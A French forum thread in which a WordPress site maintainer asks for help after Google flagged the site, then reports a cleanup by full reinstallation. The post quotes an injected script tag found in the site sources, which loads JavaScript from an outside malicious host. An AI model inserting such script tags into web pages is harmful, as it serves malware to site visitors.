Discussion :

[gwenBZH]

Bonjour,

J'ai un problème sur un site que je maintiens.
Depuis environ deux semaines, le site est détecté (à juste titre !) comme malveillant par Google entres autres. Après rapide examen des fichiers sources, je découvre ce genre de choses :

<script type="text/javascript" src="http://dolgo.lulucabana.com:8080/Link.js"></script>
<!--64a579ec00106a9f73d97a87b99c7f8e-->

Et d'autres scripts peu réjouissant.

Le site est hébergé chez zone-vip qui utilise comme outil de gestion de l'hébergement cPanel, et est un site wordpress.

Ce que j'ai fait :
- Changement du mot de passe zone-vip (un même mot de passe apparemment pour le compte zone-vip, l'accès au ftp et l'accès au phpmyadmin... impossible de changer cela)
- Suppression totale du site, et réinstallation d'un wordpress mis à jour. J'ai gardé la base et les données, je ne vois pas ce qu'elle contient qui peut causer ces problèmes).

Bref, je pensais que c'était bon, mais visiblement non... Les mêmes problèmes sont revenus : site bloqué par Google et insertion de ces quelques lignes de code dans mes sources.

Je ne sais pas quoi faire de plus, je reste perplexe...
Avez-vous quelques idées, suggestions ?

Lien vers le site :
http://www.itineraire-bis.org/
(Actuellement, j'ai modifié le .htaccess pour rediriger vers notre forum)

[gwenBZH]

Bon, ça a l'air réglé. J'ai vraiment tout supprimé (base de données, utilisateurs, différents plugins), réinstallé un wordpress à jour sain, installé la dernière version du thème, remis juste les plugins que j'utilise.
J'ai réinséré à la main les données en base pour ne pas tout réinséré (notamment les utilisateurs), sécuriser comme il faut les répertoires de mon site par .htaccess.

Tout semble rentré dans l'ordre, je ne sais toujours pas où se situait la faille.